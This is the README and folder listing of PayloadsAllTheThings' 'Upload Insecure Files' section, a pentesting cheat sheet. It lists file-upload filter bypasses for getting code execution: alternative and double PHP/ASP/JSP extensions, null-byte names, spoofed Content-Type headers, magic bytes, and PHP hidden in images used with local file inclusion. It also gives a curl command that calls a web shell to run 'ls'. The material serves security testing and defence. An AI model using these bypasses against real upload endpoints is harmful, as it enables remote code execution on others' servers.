PayloadsAllTheThings/Upload Insecure Files
vict0ni e61db57ff1
Update README.md
fixed indentation
2020-05-14 00:10:12 +02:00
..
CVE Ffmpeg HLS Fix name's capitalization 2019-03-07 00:07:55 +01:00
CVE ZIP Symbolic Link Fix name's capitalization 2019-03-07 00:07:55 +01:00
Configuration Apache .htaccess Fix name's capitalization 2019-03-07 00:07:55 +01:00
Configuration Busybox httpd.conf Fix name's capitalization 2019-03-07 00:07:55 +01:00
Configuration IIS web.config Create web.web.config 2020-04-08 19:14:30 +02:00
Configuration Python __init__.py Fix name's capitalization 2019-03-07 00:07:55 +01:00
EICAR Fix name's capitalization 2019-03-07 00:07:55 +01:00
Extension ASP IIS asp shell with .asa, .cer, .xamlx 2019-11-16 14:53:42 +01:00
Extension Flash Fix name's capitalization 2019-03-07 00:07:55 +01:00
Extension HTML Fix name's capitalization 2019-03-07 00:07:55 +01:00
Extension PDF JS Fix name's capitalization 2019-03-07 00:07:55 +01:00
Extension PHP PrivEsc - sudoers + Upload PHP 2019-09-02 12:36:40 +02:00
Picture Image Magik CVE-2019-1322 UsoSvc 2019-11-11 20:31:07 +01:00
Picture Metadata Fix name's capitalization 2019-03-07 00:07:55 +01:00
Picture Resize Fix name's capitalization 2019-03-07 00:07:55 +01:00
Server Side Include Fix name's capitalization 2019-03-07 00:07:55 +01:00
Zip Slip Update and rename ReadMe.txt to README.md 2019-10-30 12:07:50 +08:00
README.md Update README.md 2020-05-14 00:10:12 +02:00

README.md

Upload

Uploaded files may pose a significant risk if not handled correctly. A remote attacker could send a multipart/form-data POST request with a specially-crafted filename or mime type and execute arbitrary code.

Summary

Tools

Exploits

PHP Extension

.php
.php3
.php4
.php5
.php7

Less known extensions
.pht
.phar
.phpt
.pgif
.phtml
.phtm

Double extensions
.jpeg.php
.jpg.php
.png.php

Other extensions

asp : .asp, .aspx, .cer and .asa (IIS <= 7.5), shell.aspx;1.jpg (IIS < 7.0)
perl: .pl, .pm, .cgi, .lib
jsp : .jsp, .jspx, .jsw, .jsv, .jspf
Coldfusion: .cfm, .cfml, .cfc, .dbm

Upload tricks

  • Null byte (works well against pathinfo())

    • .php%00.gif
    • .php\x00.gif
    • .php%00.png
    • .php\x00.png
    • .php%00.jpg
    • .php\x00.jpg
  • Mime type, change Content-Type : application/x-php or Content-Type : application/octet-stream to Content-Type : image/gif

    • Content-Type : image/gif
    • Content-Type : image/png
    • Content-Type : image/jpeg
  • Magic Bytes

    Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application.

Picture upload with LFI

Valid pictures hosting PHP code. Upload the picture and use a local file inclusion to execute the code. The shell can be called with the following command : curl 'http://localhost/test.php?0=system' --data "1='ls'".

  • Picture Metadata, hide the payload inside a comment tag in the metadata.
  • Picture Resize, hide the payload within the compression algorithm in order to bypass a resize. Also defeating getimagesize() and imagecreatefromgif().

Configuration Files

  • .htaccess
  • web.config
  • httpd.conf
  • __init__.py

CVE - Image Tragik

HTTP Request
Reverse Shell
Touch command

References